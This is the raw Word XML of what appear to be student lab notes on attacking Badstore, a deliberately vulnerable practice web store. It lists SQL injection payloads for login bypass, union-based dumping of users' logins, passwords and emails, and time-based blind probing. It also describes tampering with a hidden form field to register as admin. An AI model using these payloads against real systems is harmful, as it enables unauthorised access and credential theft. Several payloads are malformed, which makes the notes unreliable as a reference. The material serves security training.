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64F2" w14:textId="6FE9FAA8" w:rsidR="002C4FB5" w:rsidRDefault="002C4FB5">
      <w:r w:rsidRPr="002C4FB5">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4FB5">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4FB5">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A7077" w14:textId="014EA6BB" w:rsidR="00CB3209" w:rsidRDefault="009D72F4" w:rsidP="00CB3209">
      <w:bookmarkStart w:id="0" w:name="_Hlk90588492"/>
      <w:r>
        <w:t xml:space="preserve">To get access as a user ‘or 1=1 or </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415EF940" w14:textId="43AF06AC" w:rsidR="00CB3209" w:rsidRDefault="00CB3209" w:rsidP="00CB3209">
      <w:pPr>
        <w:ind w:left="2592"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E5BD5" w14:textId="77777777" w:rsidR="00CB3209" w:rsidRDefault="00CB3209" w:rsidP="00CB3209">
      <w:pPr>
        <w:ind w:left="864"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D693127" w14:textId="20898E3A" w:rsidR="009D72F4" w:rsidRDefault="009D72F4">
      <w:r>
        <w:t xml:space="preserve">It’s given us access as a test user but we want admin privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634FA9DE" w14:textId="66CD0460" w:rsidR="009D72F4" w:rsidRDefault="009D72F4">
      <w:r>
        <w:t>for that we need change in code to send registration as admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A809D1" w14:textId="1083B4DD" w:rsidR="00D17E0C" w:rsidRDefault="00D17E0C" w:rsidP="00D17E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>first view the source page code specifically for registration page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE2E7F" w14:textId="64C7A55E" w:rsidR="00D17E0C" w:rsidRDefault="00D17E0C" w:rsidP="00D17E0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>find a hidden row in code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E98A60" w14:textId="737538E6" w:rsidR="00231BF2" w:rsidRDefault="00D17E0C" w:rsidP="00231BF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then change the value to from U that is for user registration to A for admin registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855A3C9" w14:textId="57DE09A1" w:rsidR="00D17E0C" w:rsidRDefault="00D17E0C" w:rsidP="00E76DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then go to application registration line and change the </w:t>
      </w:r>
      <w:r w:rsidR="00231BF2">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to give the web server address for registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09694D" w14:textId="7D09045F" w:rsidR="009D72F4" w:rsidRDefault="009D72F4">
      <w:r>
        <w:t xml:space="preserve">And change URL form registration page to admin succeeded. </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="5DF99FA1" w14:textId="45BC6448" w:rsidR="002C4FB5" w:rsidRDefault="002C4FB5" w:rsidP="002C4FB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00862B60">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675FF080" w14:textId="2E493EE3" w:rsidR="00862B60" w:rsidRDefault="00862B60" w:rsidP="00862B60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk90589809"/>
      <w:r>
        <w:t xml:space="preserve">Union based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE5DB6" w14:textId="13634F87" w:rsidR="00862B60" w:rsidRPr="00862B60" w:rsidRDefault="00862B60" w:rsidP="00862B60">
      <w:r>
        <w:t>In this the attacker modify the query using the original query to attack on database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CF85C" w14:textId="02C0BDF4" w:rsidR="002C4FB5" w:rsidRDefault="002C4FB5">
      <w:r>
        <w:t>Whenever an error is return by database it is the indication that database is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743FA61" w14:textId="4DA0A507" w:rsidR="002C4FB5" w:rsidRDefault="002C4FB5">
      <w:r>
        <w:t>For exploitation to succeed we need to find no of columns we have in database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E3197" w14:textId="33F675F1" w:rsidR="00C85A6C" w:rsidRDefault="002C4FB5" w:rsidP="00C85A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We do it by trying to figure out by blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to try guess the no. of columns if we receive error we try again if no error </w:t>
      </w:r>
      <w:r w:rsidR="00C85A6C">
        <w:t>is received means guess is succeeded</w:t>
      </w:r>
      <w:r w:rsidR="000C6DF3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11176E21" w14:textId="3DFA7B3F" w:rsidR="000C6DF3" w:rsidRDefault="00BA70AA" w:rsidP="00C85A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Man’</w:t>
      </w:r>
      <w:r w:rsidR="000C6DF3">
        <w:t xml:space="preserve"> union select 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000C6DF3">
        <w:t>1,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000C6DF3">
        <w:t>keep adding ones until error stops)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58383869" w14:textId="409FB156" w:rsidR="000C6DF3" w:rsidRDefault="000C6DF3" w:rsidP="000C6DF3">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>To find the version and name of database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49630E94" w14:textId="759D6145" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the query one same as the column no. but add database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paranthesis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in between </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A99997" w14:textId="4634C28E" w:rsidR="007F784B" w:rsidRDefault="00BA70AA" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>man’</w:t>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F784B">
        <w:t>1,Database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve">()1,1# </w:t>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve"> remember to use no. of ones that were no of column in first injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855FC72" w14:textId="61B8496E" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5F09A" w14:textId="3159E5DD" w:rsidR="007F784B" w:rsidRDefault="00BA70AA" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>man’</w:t>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve"> union select 1,1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F784B">
        <w:t>1,version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007F784B">
        <w:t>,1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F61A3E" w14:textId="0401980A" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>By finding version and name of database we can search for related vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3257DA" w14:textId="79831606" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B"/>
    <w:p w14:paraId="34F0D53F" w14:textId="5FAA4243" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B">
      <w:r>
        <w:t xml:space="preserve">To find all table names we need </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCF9AE" w14:textId="5BB11D34" w:rsidR="007F784B" w:rsidRDefault="007F784B" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">inject query which ask for table no and name like </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA2DF5" w14:textId="5FDE49C8" w:rsidR="007F784B" w:rsidRDefault="00BA70AA" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>man’</w:t>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve"> union select 1,1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F784B">
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007F784B">
        <w:t xml:space="preserve">_name,1 FROM  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="007F784B">
        <w:t>nformation</w:t>
      </w:r>
      <w:r>
        <w:t>_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24B4D6" w14:textId="7118A337" w:rsidR="00BA70AA" w:rsidRDefault="00BA70AA" w:rsidP="007F784B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>it will return all table names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A68D2" w14:textId="73965629" w:rsidR="00BA70AA" w:rsidRDefault="00BA70AA" w:rsidP="00BA70AA"/>
    <w:p w14:paraId="69745742" w14:textId="1DF4333A" w:rsidR="00BA70AA" w:rsidRDefault="00BA70AA" w:rsidP="00BA70AA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To find column name now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E07A5" w14:textId="16CB371C" w:rsidR="00BA70AA" w:rsidRDefault="00BA70AA" w:rsidP="00BA70AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">using the table name find by above </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0DE72B" w14:textId="2D500F3F" w:rsidR="00BA70AA" w:rsidRDefault="00BA70AA" w:rsidP="00BA70AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>man’ union select 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">_name,1,1 </w:t>
      </w:r>
      <w:r w:rsidR="003644A5">
        <w:t xml:space="preserve">FORM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003644A5">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003644A5">
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003644A5">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003644A5">
        <w:t>=’users’#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365BF4C" w14:textId="25FED49F" w:rsidR="003644A5" w:rsidRDefault="003644A5" w:rsidP="00BA70AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>it will show all the columns for mentioned table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FA3F7" w14:textId="2596B7F5" w:rsidR="003644A5" w:rsidRDefault="003644A5" w:rsidP="003644A5"/>
    <w:p w14:paraId="221BF584" w14:textId="2CEB2DEC" w:rsidR="003644A5" w:rsidRDefault="003644A5" w:rsidP="003644A5">
      <w:r>
        <w:t>To view columns of password email and other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D79B8" w14:textId="6FAFABEE" w:rsidR="003644A5" w:rsidRDefault="003644A5" w:rsidP="003644A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>we use the columns of the above injected table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163AED7" w14:textId="64EA35FB" w:rsidR="003644A5" w:rsidRDefault="003644A5" w:rsidP="003644A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">man’ union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">,password,email,secret,1,1 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=’users’#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825D6E6" w14:textId="25E9B1E1" w:rsidR="003644A5" w:rsidRDefault="00862B60" w:rsidP="003644A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>now using the decryption algorithm passwords can be decrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033BA430" w14:textId="5BC6C609" w:rsidR="00862B60" w:rsidRDefault="00862B60" w:rsidP="00862B60">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A82839" w14:textId="25F5D961" w:rsidR="00862B60" w:rsidRDefault="00DB014A" w:rsidP="00DB014A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1196E" w14:textId="77777777" w:rsidR="00DB014A" w:rsidRPr="00DB014A" w:rsidRDefault="00DB014A" w:rsidP="00DB014A"/>
    <w:p w14:paraId="769921FB" w14:textId="3F8CE75E" w:rsidR="009D72F4" w:rsidRDefault="00862B60">
      <w:r>
        <w:t>To select all product form database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94CE54" w14:textId="246694BA" w:rsidR="00862B60" w:rsidRDefault="00DB014A" w:rsidP="00862B60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘;--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view all possible products.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FAE57" w14:textId="4C0E7CAA" w:rsidR="00DB014A" w:rsidRDefault="00DB014A" w:rsidP="00862B60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use sleep function that is use by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to guess the database type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D15601" w14:textId="4E304458" w:rsidR="00DB014A" w:rsidRDefault="00DB014A" w:rsidP="00862B60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>productname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ AND 1 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SLEEP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">2);-- </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to try to guess the database type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5C68B" w14:textId="1087E666" w:rsidR="00DB014A" w:rsidRDefault="00547DC1" w:rsidP="00862B60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this we check the product first then we try to guess the no of seconds it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wait</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> before returning the result if It does return it then it is within counted seconds </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E8702" w14:textId="53B5C844" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F"/>
    <w:p w14:paraId="7FD0C353" w14:textId="7D01187A" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72711696" w14:textId="77777777" w:rsidR="00CC3F8F" w:rsidRPr="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F"/>
    <w:p w14:paraId="00805612" w14:textId="2E14FC54" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:r>
        <w:t xml:space="preserve">In this we send error to the database to check for the vulnerability and if error is response that means </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is vulnerable and also show the query structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620EDAA" w14:textId="6213E03F" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Send random username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8EB5BE" w14:textId="45FCEA63" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Boolean based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8BB19" w14:textId="53EE6D78" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F"/>
    <w:p w14:paraId="7CEA880E" w14:textId="1C4BCB47" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:r>
        <w:t xml:space="preserve">Boolean values are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to inject and manipulate the query and to break the database concept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C21812" w14:textId="49E366FE" w:rsidR="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>‘OR ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="33F30CDE" w14:textId="77777777" w:rsidR="00CC3F8F" w:rsidRPr="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DE2B5D" w14:textId="77777777" w:rsidR="00CC3F8F" w:rsidRPr="00CC3F8F" w:rsidRDefault="00CC3F8F" w:rsidP="00CC3F8F"/>
    <w:p w14:paraId="66416A3D" w14:textId="0AFD3DC5" w:rsidR="00547DC1" w:rsidRDefault="00547DC1" w:rsidP="00E807A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30376E42" w14:textId="598D9C96" w:rsidR="001F2E2F" w:rsidRPr="001F2E2F" w:rsidRDefault="001F2E2F" w:rsidP="001F2E2F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001F2E2F" w:rsidRPr="001F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D550D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B248E9B8"/>
    <w:lvl w:ilvl="0" w:tplc="09E4C3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0294D1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C834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F4"/>
    <w:rsid w:val="000C6DF3"/>
    <w:rsid w:val="001F2E2F"/>
    <w:rsid w:val="00231BF2"/>
    <w:rsid w:val="0029655C"/>
    <w:rsid w:val="002C4FB5"/>
    <w:rsid w:val="003644A5"/>
    <w:rsid w:val="003C41AD"/>
    <w:rsid w:val="00495326"/>
    <w:rsid w:val="00547DC1"/>
    <w:rsid w:val="00730F33"/>
    <w:rsid w:val="007F3B0B"/>
    <w:rsid w:val="007F784B"/>
    <w:rsid w:val="00862B60"/>
    <w:rsid w:val="009D72F4"/>
    <w:rsid w:val="00BA70AA"/>
    <w:rsid w:val="00C85A6C"/>
    <w:rsid w:val="00CB3209"/>
    <w:rsid w:val="00CC3F8F"/>
    <w:rsid w:val="00D17E0C"/>
    <w:rsid w:val="00DB014A"/>
    <w:rsid w:val="00DB6AD2"/>
    <w:rsid w:val="00E71A06"/>
    <w:rsid w:val="00E76DFE"/>
    <w:rsid w:val="00E8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2DDF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35E79A69-4154-4973-9A97-E7EC172B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4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4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ED6E-6061-4057-9BCF-D445FFF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Ira</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sumera N</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-14T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-06T16:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>